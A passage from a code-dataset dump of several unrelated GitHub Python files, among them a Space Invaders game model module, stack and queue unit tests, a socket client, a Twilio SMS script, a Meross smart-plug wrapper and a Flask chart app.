need something special for your extra gameplay\nfeatures, Ship and Aliens could just be an instance of GImage that you move\nacross the screen. You only need a new class when you add extra features to\nan object. So technically Bolt, which has a velocity, is really the only model\nthat needs to have its own class.\n\nWith that said, we have included the subclasses for Ship and Aliens. That is\nbecause there are a lot of constants in consts.py for initializing the\nobjects, and you might want to add a custom initializer. With that said,\nfeel free to keep the pass underneath the class definitions if you do not want\nto do that.\n\nYou are free to add even more models to this module. You may wish to do this\nwhen you add new features to your game, such as power-ups. If you are unsure\nabout whether to make a new class or not, please ask on Piazza.\n\n# Aashri Aggarwal (aia56) and Abby Sachar (ahs265)\n# December 10th, 2019\n\"\"\"\nfrom consts import *\nfrom game2d import *\nimport random\nimport math\n\n# PRIMARY RULE: Models are not allowed to access anything in any module other\n# than consts.py. If you need extra information from Gameplay, then it should\n# be a parameter in your method, and Wave should pass it as a argument when it\n# calls the method.\n\n\nclass Ship(GImage):\n \"\"\"\n A class to represent the game ship.\n\n At the very least, you want a __init__ method to initialize the ships\n dimensions. These dimensions are all specified in consts.py.\n\n You should probably add a method for moving the ship. While moving a\n ship just means changing the x attribute (which you can do directly),\n you want to prevent the player from moving the ship offscreen. This\n is an ideal thing to do in a method.\n\n You also MIGHT want to add code to detect a collision with a bolt. We\n do not require this. You could put this method in Wave if you wanted to.\n But the advantage of putting it here is that Ships and Aliens collide\n with different bolts. Ships collide with Alien bolts, not Ship bolts.\n And Aliens collide with Ship bolts, not Alien bolts. An easy way to\n keep this straight is for this class to have its own collision method.\n\n However, there is no need for any more attributes other than those\n inherited by GImage. You would only add attributes if you needed them\n for extra gameplay features (like animation).\n \"\"\"\n # IF YOU ADD ATTRIBUTES, LIST THEM BELOW\n pass\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getShip_x(self):\n \"\"\"\n Returns the horizontal coordinate of the ship object\n \"\"\"\n return self.x\n\n def __init__(self, x, y, width = SHIP_WIDTH, height = SHIP_HEIGHT):\n \"\"\"\n Initializes the ship dimensions.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter source: The image file of the object created\n Precondition: Must be a png file\n\n Parameter width: The horizontal length of the object\n Precondition: Value must be an int or float and must be >= 0\n\n Parameter height: The vertical length of the object\n Precondition: Value must be an int or float and must be >= 0\n \"\"\"\n assert type(x) in [int, float]\n assert type(y) in [int, float]\n assert type(width) == int or type(width) == float\n assert width >= 0\n assert type(height) == int or type(height) == float\n assert height >= 0\n\n super().__init__(x=x, y=y,width = width, height = height, source = 'Ship.png')\n\n # METHODS TO MOVE THE SHIP AND CHECK FOR COLLISIONS\n def collideswShip(self, bolt):\n \"\"\"\n Returns True if the alien bolt collides with the ship.\n\n This method returns False if bolt was not fired by an alien.\n\n Parameter bolt: The laser bolt to check\n Precondition: bolt is of class Bolt\n \"\"\"\n #Check if bolt was fired by player\n if bolt.getVelocity() > 0:\n return False\n if self.contains(bolt.leftTopCorner()) == True:\n return True\n elif self.contains(bolt.rightTopCorner()) == True:\n return True\n elif self.contains(bolt.leftBottomCorner()) == True:\n return True\n elif self.contains(bolt.rightBottomCorner()) == True:\n return True\n else:\n return False\n\n def collideswShip2(self, pup):\n \"\"\"\n Returns True if the alien bolt collides with the ship.\n\n This method returns False if bolt was not fired by an alien.\n\n Parameter pup: The powerup to check\n Precondition: pup is of class PowerUp\n \"\"\"\n #Check if bolt was fired by player\n if self.contains(pup.leftTopCorner()) == True:\n return True\n elif self.contains(pup.rightTopCorner()) == True:\n return True\n elif self.contains(pup.leftBottomCorner()) == True:\n return True\n elif self.contains(pup.rightBottomCorner()) == True:\n return True\n else:\n return False\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n\n\nclass Alien(GImage):\n \"\"\"\n A class to represent a single alien.\n\n At the very least, you want a __init__ method to initialize the alien\n dimensions. These dimensions are all specified in consts.py.\n\n You also MIGHT want to add code to detect a collision with a bolt. We\n do not require this. You could put this method in Wave if you wanted to.\n But the advantage of putting it here is that Ships and Aliens collide\n with different bolts. Ships collide with Alien bolts, not Ship bolts.\n And Aliens collide with Ship bolts, not Alien bolts. An easy way to\n keep this straight is for this class to have its own collision method.\n\n However, there is no need for any more attributes other than those\n inherited by GImage. You would only add attributes if you needed them\n for extra gameplay features (like giving each alien a score value).\n \"\"\"\n # IF YOU ADD ATTRIBUTES, LIST THEM BELOW\n #Attribute: _points: number of points an alien is worth\n #Invariant: _points is an int >= 0\n pass\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getAlien_x(self):\n \"\"\"\n Returns the x coordinate of the alien object.\n \"\"\"\n return self.x\n\n def getAlien_y(self):\n \"\"\"\n Returns the y coordinate of the alien object.\n \"\"\"\n return self.y\n\n def getAlienpoints(self):\n \"\"\"\n Returns the number of points the alien is worth.\n \"\"\"\n return self._points\n\n def setAlien_x(self, value):\n \"\"\"\n Sets x coordinate of the alien object to value.\n\n Parameter value: the new x coordinate for the alien object\n Precondition: must be an int or float\n \"\"\"\n assert type(value) in [int, float]\n self.x = value\n\n def setAlien_y(self, value):\n \"\"\"\n Sets y coordinate of the alien object to value.\n\n Parameter value: the new y coordinate for the alien object\n Precondition: must be an int or float\n \"\"\"\n assert type(value) in [int, float]\n self.y = value\n\n # INITIALIZER TO CREATE AN ALIEN\n def __init__(self, x, y, source, width = ALIEN_WIDTH, height = ALIEN_HEIGHT):\n \"\"\"\n Initializes the alien dimensions.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter source: The image file of the object created\n Precondition: Must be a png file\n\n Parameter width: The horizontal length of the object\n Precondition: Value must be an int or float and must be >= 0\n\n Parameter height: The vertical length of the object\n Precondition: Value must be an int or float and must be >= 0\n \"\"\"\n assert type(x) in [int, float]\n assert type(y) in [int, float]\n assert source in ALIEN_IMAGES\n assert type(width) == int or type(width) == float\n assert width >= 0\n assert type(height) == int or type(height) == float\n assert height >= 0\n\n super().__init__(x=x, y=y,width = width, height = height, source = source)\n if source == ALIEN_IMAGES[0]:\n self._points = 10\n elif source == ALIEN_IMAGES[1]:\n self._points = 20\n elif source == ALIEN_IMAGES[2]:\n self._points = 30\n\n # METHOD TO CHECK FOR COLLISION (IF DESIRED)\n def collideswAlien(self, bolt):\n \"\"\"\n Returns True if the player bolt collides with this Alien.\n\n This method returns False if bolt was not fired by the player.\n\n Parameter bolt: The laser bolt to check\n Precondition: bolt is of class Bolt\n \"\"\"\n #Check if bolt was fired by player\n if bolt.getVelocity() < 0:\n return False\n if self.contains(bolt.leftTopCorner()) == True:\n return True\n elif self.contains(bolt.rightTopCorner()) == True:\n return True\n elif self.contains(bolt.leftBottomCorner()) == True:\n return True\n elif self.contains(bolt.rightBottomCorner()) == True:\n return True\n else:\n return False\n\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n\nclass Bolt(GRectangle):\n \"\"\"\n A class representing a laser bolt.\n\n Laser bolts are often just thin, white rectangles. The size of the bolt\n is determined by constants in consts.py. We MUST subclass GRectangle,\n because we need to add an extra (hidden) attribute for the velocity of\n the bolt.\n\n The class Wave will need to look at these attributes, so you will need\n getters for them. However, it is possible to write this assignment with\n no setters for the velocities. That is because the velocity is fixed and\n cannot change once the bolt is fired.\n\n In addition to the getters, you need to write the __init__ method to set\n the starting velocity. This __init__ method will need to call the __init__\n from GRectangle as a helper.\n\n You also MIGHT want to create a method to move the bolt. You move the\n bolt by adding the velocity to the y-position. However, the getter\n allows Wave to do this on its own, so this method is not required.\n \"\"\"\n # INSTANCE ATTRIBUTES:\n # Attribute _velocity: the velocity in y direction\n # Invariant: _velocity is an int or float\n #\n\n # LIST MORE ATTRIBUTES (AND THEIR INVARIANTS) HERE IF NECESSARY\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getVelocity(self):\n \"\"\"\n Return _velocity of the bolt object.\n \"\"\"\n return self._velocity\n\n # INITIALIZER TO SET THE VELOCITY\n def __init__(self, velocity, x, y):\n \"\"\"\n Initializes the bolt dimensions\n \"\"\"\n super().__init__(x = x, y = y, width = BOLT_WIDTH, height = BOLT_HEIGHT,\n fillcolor = 'red', linecolor = 'red')\n self._velocity = velocity\n\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n def isPlayerBolt(self):\n \"\"\"\n Changes the velocity for a bolt fired by the player\n \"\"\"\n self._velocity = BOLT_SPEED\n\n def isAlienBolt(self):\n \"\"\"\n Changes the velocity for a bolt fired by the alien\n \"\"\"\n self._velocity = -BOLT_SPEED\n\n def leftTopCorner(self):\n \"\"\"\n Returns the top left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def rightTopCorner(self):\n \"\"\"\n Returns the top right corner of the bolt object as a tuble.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def leftBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n def rightBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n # IF YOU NEED ADDITIONAL MODEL CLASSES, THEY GO HERE\nclass Heart(GImage):\n \"\"\"\n A class representing a heart (life).\n \"\"\"\n def __init__(self, x, y):\n \"\"\"\n Initializes the heart object.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n \"\"\"\n width = HEART_WIDTH\n height = HEART_HEIGHT\n source = 'heart.png'\n super().__init__(x=x, y=y,width = width, height = height, source = source)\n\nclass Spark(GEllipse):\n \"\"\"\n A class to represent particles created in shell explosions.\n \"\"\"\n # HIDDEN ATTRIBUTES\n # Attribute _vx: velocity in x direction\n # Invariant: _vx is a float\n #\n # Attribute _vy: velocity in y direction\n # Invariant: _vy is a float\n\n def __init__(self, x, y, color=WHITE_COLOR):\n \"\"\"\n Initializes a particle at (x,y) with random velocity and given color.\n\n Parameter x: the starting x-coordinate\n Precondition: x is a number (int or float)\n\n Parameter y: the starting y-coordinate\n Precondition: y is a number (int or float)\n\n Parameter color: the spark color\n Precondition: color is a valid color object or name (e.g. a string)\n \"\"\"\n super().__init__(x=x, y=y,\n width=PARTICLE_DIAMETER, height=PARTICLE_DIAMETER,\n fillcolor=color)\n self._vy = random.uniform(-MAX_INIT_VEL,MAX_INIT_VEL)\n self._vx = math.sqrt(MAX_INIT_VEL**2 - self._vy**2) * math.sin(random.uniform(0,2*math.pi))\n\n def move(self):\n \"\"\"\n Moves the spark by the current velocity\n \"\"\"\n self.x += self._vx\n self.y += self._vy\n self._vy += GRAVITY\n\nclass PowerUp(GImage):\n \"\"\"\n A class representing different power ups.\n\n The class will have different power ups including: ExtraLife\n \"\"\"\n # INSTANCE ATTRIBUTES:\n # Attribute _velocity: the velocity in y direction\n # Invariant: _velocity is an int or float\n\n def __init__(self, x):\n \"\"\"\n Initializes a game object powerup.\n \"\"\"\n source = 'heart.png'\n y = GAME_WIDTH - 100\n width = PUP_WIDTH\n height = PUP_HIEGHT\n super().__init__(x = x, y = y, width = width, height = height, source = source)\n\n def leftTopCorner(self):\n \"\"\"\n Returns the top left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def rightTopCorner(self):\n \"\"\"\n Returns the top right corner of the bolt object as a tuble.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def leftBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n def rightBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the bolt object as a tuble.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n","repo_name":"aashri-a/SpaceInvaders","sub_path":"invaders/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35710030738","text":"import pygame\n\nfrom si_modules.player import Player\nfrom si_modules.enemy import Enemy\nfrom si_modules.settings import Settings\nfrom si_modules.game_stats import GameStats\nfrom si_modules.button import Button\nfrom si_modules.scoreboard import Scoreboard\n\nimport si_modules.game_functions as gf\n\n\nclass SpaceImpact():\n '''\n Class to represent spaceimpact game.\n '''\n def __init__(self):\n # create screen\n self.si_settings = Settings\n self.screen = pygame.display.set_mode(self.si_settings['screen_size'])\n\n # Title and icon\n pygame.display.set_caption(\"Space Impact\")\n icon = pygame.image.load(self.si_settings['game_icon'])\n pygame.display.set_icon(icon)\n\n\n # creating player and enemy \n self.player = Player(self.si_settings, self.screen)\n self.enemy = Enemy(self.si_settings, self.screen)\n\n # Make the Play and Restart button.\n self.play_button = Button(self.screen, \"PLAY\")\n self.restart_button = Button(self.screen, \"RESTART\")\n\n # Create instance to store game stats\n self.stats = GameStats(self.si_settings)\n self.sb = Scoreboard(self.si_settings, self.screen, self.stats)\n\n # set frames per second\n self.clock = pygame.time.Clock()\n\n\n def run(self):\n # game loop\n while True:\n self.clock.tick(30)\n\n gf.check_events(self)\n\n if self.stats.game_active:\n self.player.update()\n gf.update_enemy(self.player, self.enemy, self.stats)\n gf.update_bullets(self)\n\n gf.update_screen(self)\n\n\nif __name__ == \"__main__\":\n pygame.init()\n game = SpaceImpact()\n game.run()\n pygame.quit()\n","repo_name":"laraib07/SpaceImpact","sub_path":"SpaceImpact.py","file_name":"SpaceImpact.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42025381401","text":"import datetime\n\nfrom django.db import models\n\nfrom applications.department.people.models import ServicedPerson, Visitor\n\n\nclass Leaving(models.Model):\n class Meta:\n abstract = True\n\n serviced_person = models.ForeignKey(to=ServicedPerson, on_delete=models.CASCADE, verbose_name=\"Обслуживаемый\")\n date_from = models.DateField(verbose_name=\"От\", default=datetime.datetime.now)\n date_to = models.DateField(verbose_name=\"До\", blank=True, null=True)\n commentary = models.TextField(verbose_name=\"Комментарий\", blank=True, null=True)\n\n def __str__(self):\n result = f\"{self.serviced_person} от {self.date_from}\"\n if self.date_to:\n result += f\" до {self.date_to}\"\n return result\n\n\nclass Travel(Leaving):\n class Meta:\n verbose_name = \"Поездка обслуживаемого\"\n verbose_name_plural = \"Поездки обслуживаемых\"\n\n visitor = models.ForeignKey(verbose_name=\"Родственник\", to=Visitor, blank=True, null=True,\n on_delete=models.SET_NULL)\n\n def __str__(self):\n result = \"Поездка \" + super().__str__()\n if self.visitor:\n result += f\" к {self.visitor}\"\n return result\n\n\nclass SickLeave(Leaving):\n class Meta:\n verbose_name = \"Больничный\"\n verbose_name_plural = \"Больничные\"\n\n diagnose = models.TextField(verbose_name=\"Диагноз\", blank=True, null=True)\n\n def __str__(self):\n result = \"Больничный \" + super().__str__()\n if self.diagnose and len(self.diagnose) < 15:\n result += f\" ({self.diagnose})\"\n return result\n","repo_name":"Kaper156/SocialHouse","sub_path":"SocialHouse/applications/receptionist/movements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71566294508","text":"import unittest\r\n\r\nfrom queues import Queue, QueueUnderflowException\r\nfrom stack import Stack, StackPopException\r\n\r\n\r\nclass StackTestCase(unittest.TestCase):\r\n\r\n def test_is_empty(self):\r\n stack = Stack()\r\n assert stack.is_empty() is True\r\n\r\n stack.push(1)\r\n assert stack.is_empty() is False\r\n\r\n stack.pop()\r\n assert stack.is_empty() is True\r\n\r\n def test_size(self):\r\n stack = Stack()\r\n assert len(stack) == 0\r\n\r\n stack.push(1)\r\n assert len(stack) == 1\r\n\r\n stack.pop()\r\n assert len(stack) == 0\r\n\r\n def test_push_items(self):\r\n stack = Stack()\r\n\r\n tests = [1, '0', Stack, lambda x: x, {}, [], None]\r\n\r\n for test in tests:\r\n stack.add(test)\r\n\r\n assert len(tests) == len(stack)\r\n\r\n def test_pop_items(self):\r\n stack = Stack()\r\n\r\n with self.assertRaises(StackPopException):\r\n stack.pop()\r\n\r\n one = 1\r\n two = 2\r\n\r\n stack.push(one)\r\n stack.push(two)\r\n\r\n assert len(stack) == 2\r\n\r\n assert stack.pop() == two\r\n assert stack.pop() == one\r\n\r\n assert len(stack) == 0\r\n\r\n def test_print(self):\r\n stack = Stack()\r\n\r\n assert str(stack) == ''\r\n\r\n stack.push(3)\r\n stack.push(1)\r\n stack.push(2)\r\n\r\n assert str(stack) == '2 -> 1 -> 3'\r\n\r\n\r\n\r\nclass QueueTestCase(unittest.TestCase):\r\n\r\n def test_is_empty(self):\r\n queue = Queue()\r\n assert queue.is_empty() is True\r\n\r\n queue.enqueue(1)\r\n assert queue.is_empty() is False\r\n\r\n queue.dequeue()\r\n assert queue.is_empty() is True\r\n\r\n def test_size(self):\r\n queue = Queue()\r\n assert len(queue) == 0\r\n\r\n queue.enqueue(1)\r\n assert len(queue) == 1\r\n\r\n queue.dequeue()\r\n assert len(queue) == 0\r\n\r\n def test_enqueue(self):\r\n queue = Queue()\r\n\r\n tests = [1, '0', Queue, lambda x: x, {}, [], None]\r\n\r\n for test in tests:\r\n queue.enqueue(test)\r\n\r\n assert len(tests) == len(queue)\r\n\r\n def test_dequeue(self):\r\n queue = Queue()\r\n\r\n with self.assertRaises(QueueUnderflowException):\r\n queue.dequeue()\r\n\r\n one = 1\r\n two = 2\r\n\r\n queue.enqueue(one)\r\n queue.enqueue(two)\r\n\r\n assert len(queue) == 2\r\n\r\n assert queue.dequeue() == one\r\n assert queue.dequeue() == two\r\n\r\n assert len(queue) == 0\r\n\r\n def test_print(self):\r\n queue = Queue()\r\n\r\n assert str(queue) == ''\r\n\r\n queue.enqueue(3)\r\n queue.enqueue(1)\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"By-Lucas/Tests-advanced-tests-Pytest-Unitest","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17440209691","text":"#! /usn/bin/env python3\n\nimport os, sys\nimport socket\n\nHOST = ''\nPORT = 46777\n\noptions = { 1:\"What is your name?\",\n\t\t\t2:\"How do you know to respond to these questions?\",\n\t\t\t3:\"Can I ask you a personal question?\",\n\t\t\t4:\"Can you answer an arbitrary question?\",\n\t\t\t5:\"Thank you.\"\t\n}\n\n# create an INET, STREAMing socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ns.connect(HOST, PORT)\n\nselection = 0\n\nwhile selection != 8:\n\tprint(\"What would you like to ask the server?\")\n\tprint(\"1. What is your name?\")\n\tprint(\"2. How do you know to respond to these questions?\")\n\tprint(\"3. Can I ask you a personal question?\")\n\tprint(\"4. Can you answer an arbitrary question?\")\n\tprint(\"5. Thank you.\")\n\n\t# Get user selection\n\tprint(\"Please enter a choice:\")\n\tselection = int(input())\n\tif selection not in range(1,6):\n\t\tprint(\"I do not understand your question. Please enter a number 1-5.\")\n\t\tbreak\n\n\t# Send choice to server\n\ts.send(bytearray(options[selection], 'utf8'))\n\tdata = s.recv(1024)\n\n\t# Print results\n\tprint(data.decode('utf8'))\n\tprint()\n\tbreak\n\ns.close()\n","repo_name":"mibeh/grab-bag","sub_path":"python_socket_example/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71309039787","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n# Find your Account SID and Auth Token at twilio.com/console\n# and set the environment variables. See http://twil.io/secure\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"HELLO WORLD!\",\n from_=os.environ['FROM_NUMBER'],\n to=os.environ['TO_NUMBER']\n )\n\nprint(message.sid)\n","repo_name":"lem0n4id/LearnTwilio","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39394687672","text":"'''Crie um programa que leia o ano de nascimento de sete pessoas. No final, mostre quantas pessoas ainda não atingiram\na maioridade e quantas já são maiores'''\nprint('===='*10, ' EX054 ', '===='*10)\nfrom datetime import date\natual = date.today().year\np = 0\np2 = 0\nfor c in range(1, 8):\n data = int(input(\"Digite o ano de nascimento da {}º pessoa: \".format(c)))\n m = atual - data\n if m < 21:\n p += 1\n else:\n p2 += 1\n\nprint('Tem {} que não completaram a Maioridade!'.format(p))\nprint('Tem {} que já compeltaram a Maioridade!!'.format(p2))\n","repo_name":"JulliusCaesar/ExerciciosPyCharm","sub_path":"PythonExercicios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24566315530","text":"class dictionary_iter:\r\n def __init__(self, dic):\r\n self.dic = dic\r\n self.idx = 0\r\n def __iter__(self):\r\n return self\r\n\r\n def __next__(self):\r\n if self.idx > len(self.dic)-1:\r\n raise StopIteration\r\n result = list(self.dic.items())[self.idx]\r\n self.idx += 1\r\n return result\r\n\r\n\r\nresult = dictionary_iter({1: \"1\", 2: \"2\"})\r\nfor x in result:\r\n print(x)\r\n\r\nprint(20*'-')\r\n\r\nresult = dictionary_iter({\"name\": \"Peter\", \"age\": 24})\r\nfor x in result:\r\n print(x)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BatVanko/2_dictionary_iterator_iterators_and_generators_exercise","sub_path":"2_dictionary_iterator.py","file_name":"2_dictionary_iterator.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22800529752","text":"# -*- coding: utf-8 -*-\nimport terrariumLogging\nlogger = terrariumLogging.logging.getLogger(__name__)\n\nimport asyncio\nimport contextlib\nimport threading\n\nfrom time import sleep, time\n\nfrom terrariumUtils import terrariumCache, terrariumUtils, terrariumSingleton, terrariumAsync\n\n# pip install meross-iot\n# https://github.com/albertogeniola/MerossIot\nfrom meross_iot.http_api import MerossHttpClient\nfrom meross_iot.manager import MerossManager\nfrom meross_iot.controller.mixins.toggle import ToggleXMixin\nfrom meross_iot.model.http.exception import BadLoginException\nfrom meross_iot.model.exception import CommandTimeoutError\n\nclass TerrariumMerossCloud(terrariumSingleton):\n\n def __init__(self, username, password):\n start = time()\n self.__engine = { 'cache' : terrariumCache(), 'running': False, 'event': asyncio.Event() , 'asyncio' : terrariumAsync()}\n\n self._data = {}\n self._username = username\n self._password = password\n self._start()\n\n while not self.__engine['running']:\n logger.info('Waiting for Meross cloud connection ... ')\n sleep(1)\n\n logger.info(f'Meross cloud is connected! Found {len(self._data)} devices in {time()-start:.2f} seconds.')\n\n def _start(self):\n\n def _run():\n data = asyncio.run_coroutine_threadsafe(self._main_process(), self.__engine['asyncio'].async_loop)\n data.result()\n\n self.__engine['thread'] = threading.Thread(target=_run)\n self.__engine['thread'].start()\n\n def _store_data(self):\n for key in self._data:\n self.__engine['cache'].set_data(key, self._data[key],90)\n\n def scan_hardware(self,type):\n\n async def _scan_hardware(type):\n await self.manager.async_device_discovery()\n meross_devices = []\n if 'sensors' == type:\n meross_devices = self.manager.find_devices(device_type='ms100')\n elif 'relays' == type:\n meross_devices = self.manager.find_devices(device_class=ToggleXMixin)\n\n return meross_devices\n\n data = asyncio.run_coroutine_threadsafe(_scan_hardware(type), self.__engine['asyncio'].async_loop)\n devices = data.result()\n return devices\n\n def toggle_relay(self, device, switch, state):\n\n async def _toggle_relay(device, switch, state):\n device = self.manager.find_devices(device_uuids=[device])\n if len(device) == 1:\n device = device[0]\n\n if state != 0.0:\n await device.async_turn_on(channel=switch)\n else:\n await device.async_turn_off(channel=switch)\n\n return True\n\n return None\n\n data = asyncio.run_coroutine_threadsafe(_toggle_relay(device, switch, state), self.__engine['asyncio'].async_loop)\n result = data.result()\n return result\n\n def stop(self):\n logger.info('Stopping Meross cloud ... ')\n self.__engine['running'] = False\n self.__engine['event'].set()\n self.__engine['thread'].join()\n\n async def _main_process(self):\n\n # https://stackoverflow.com/a/49632779\n async def event_wait(evt, timeout):\n # suppress TimeoutError because we'll return False in case of timeout\n with contextlib.suppress(asyncio.TimeoutError):\n await asyncio.wait_for(evt.wait(), timeout)\n return evt.is_set()\n\n async def _notification(push_notification, target_devices):\n logger.info('Got an update from the Meross Cloud.')\n for device in target_devices:\n if hasattr(device,'is_on'):\n self._data[f'{device.uuid}'] = []\n\n for channel in device.channels:\n self._data[f'{device.uuid}'].append(device.is_on(channel=channel.index))\n\n if hasattr(device,'last_sampled_temperature'):\n self._data[f'{device.subdevice_id}'] = {\n 'temperature' : device.last_sampled_temperature,\n 'humidity' : device.last_sampled_humidity\n }\n\n self._store_data()\n\n try:\n # Setup the HTTP client API from user-password\n http_api_client = await MerossHttpClient.async_from_user_password(email=self._username, password=self._password)\n\n # Setup and start the device manager\n self.manager = MerossManager(http_client=http_api_client)\n await self.manager.async_init()\n\n # Discover devices.\n await self.manager.async_device_discovery()\n meross_devices = self.manager.find_devices()\n for dev in meross_devices:\n\n # Is a relay\n if hasattr(dev,'is_on'):\n await dev.async_update()\n self._data[f'{dev.uuid}'] = []\n\n for channel in dev.channels:\n self._data[f'{dev.uuid}'].append(dev.is_on(channel=channel.index))\n\n # Is a sensor\n if hasattr(dev,'last_sampled_temperature'):\n await dev.async_update()\n #print(f'Last data: {dev.last_sampled_time}')\n self._data[f'{dev.subdevice_id}'] = {\n 'temperature' : dev.last_sampled_temperature,\n 'humidity' : dev.last_sampled_humidity\n }\n\n self._store_data()\n self.__engine['running'] = True\n self.manager.register_push_notification_handler_coroutine(_notification)\n\n while not await event_wait(self.__engine['event'], 30):\n self._store_data()\n\n except CommandTimeoutError:\n logger.error(f'Meross communication timed out connecting with the server.')\n except BadLoginException:\n logger.error(f'Wrong login credentials for Meross. Please check your settings')\n\n finally:\n # Close the manager and logout from http_api\n self.manager.close()\n await http_api_client.async_logout()\n logger.info('Closed Meross cloud connection')","repo_name":"hortocam/TerrariumPI","sub_path":"terrariumCloud.py","file_name":"terrariumCloud.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"56036272","text":"import os\r\n\r\nfrom flask import Flask, abort, send_from_directory\r\nfrom jinja2.exceptions import TemplateNotFound\r\nimport csv\r\nfrom flaskr.charts import Charts\r\n\r\ndef read_data(app):\r\n data_file = os.path.join(app.root_path, 'data', 'cardio_train.csv')\r\n \r\n with open(data_file) as csvfile:\r\n reader = csv.reader(csvfile, delimiter=';')\r\n headers = next(reader) # Read the first row as headers\r\n\r\n charts = Charts()\r\n for row in reader:\r\n datapoint = {}\r\n for i, header in enumerate(headers):\r\n datapoint[header] = row[i]\r\n charts.aggregate(datapoint)\r\n\r\n charts.plot()\r\n return charts \r\n\r\ndef create_app():\r\n app = Flask(__name__)\r\n charts = read_data(app)\r\n\r\n @app.route('/charts/')\r\n def get_chart_list():\r\n return list(charts.names())\r\n \r\n @app.route('/charts/<name>')\r\n def get_chart(name):\r\n plot_config = charts.get(name)\r\n if plot_config is None:\r\n abort(404)\r\n return plot_config\r\n\r\n @app.route('/')\r\n @app.route('/<path>.html')\r\n def pages(path=None):\r\n if path is None:\r\n path = \"index\"\r\n try:\r\n return send_from_directory('pages', path + \".html\")\r\n except TemplateNotFound:\r\n abort(404)\r\n return app","repo_name":"cathyQinQin/cardiovasular-disease-data-visualization","sub_path":"flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7641553827","text":"import cv2\nfrom primitives import constants\nimport numpy as np\n\nfrom copy import deepcopy\nfrom enum import IntEnum\n\nfrom primitives.coordinates import Coordinates\nfrom primitives.enums import Mode\nfrom primitives.line import ransac, Line, SamePointError\nfrom pipeline.base.pipeline import is_frequency, ThreadedPipeBlock\nfrom pipeline.traffic_light_observer import Color\n\n\nclass CarBehaviourMode(IntEnum):\n NORMAL = 1\n LINE_CROSSED = 2\n RED_DRIVER = 3\n ORANGE_DRIVER = 4\n\n\nclass Box2D:\n \"\"\"\n Bounding box around car.\n Holds printable information about car and its behavior classification in video.\n \"\"\"\n\n def __init__(self, car_id):\n self._top_left = None\n self._bottom_right = None\n self._car_id = car_id\n self._red_distance_traveled = 0\n\n self._behaviour = CarBehaviourMode.NORMAL\n\n self._lifetime = 1\n self._history = []\n\n @property\n def behaviour(self):\n \"\"\"\n :return: behaviour classification\n \"\"\"\n return self._behaviour\n\n @property\n def top_left(self):\n \"\"\"\n :return: coordinates top left corner of bounding box\n \"\"\"\n\n return self._top_left\n\n @property\n def 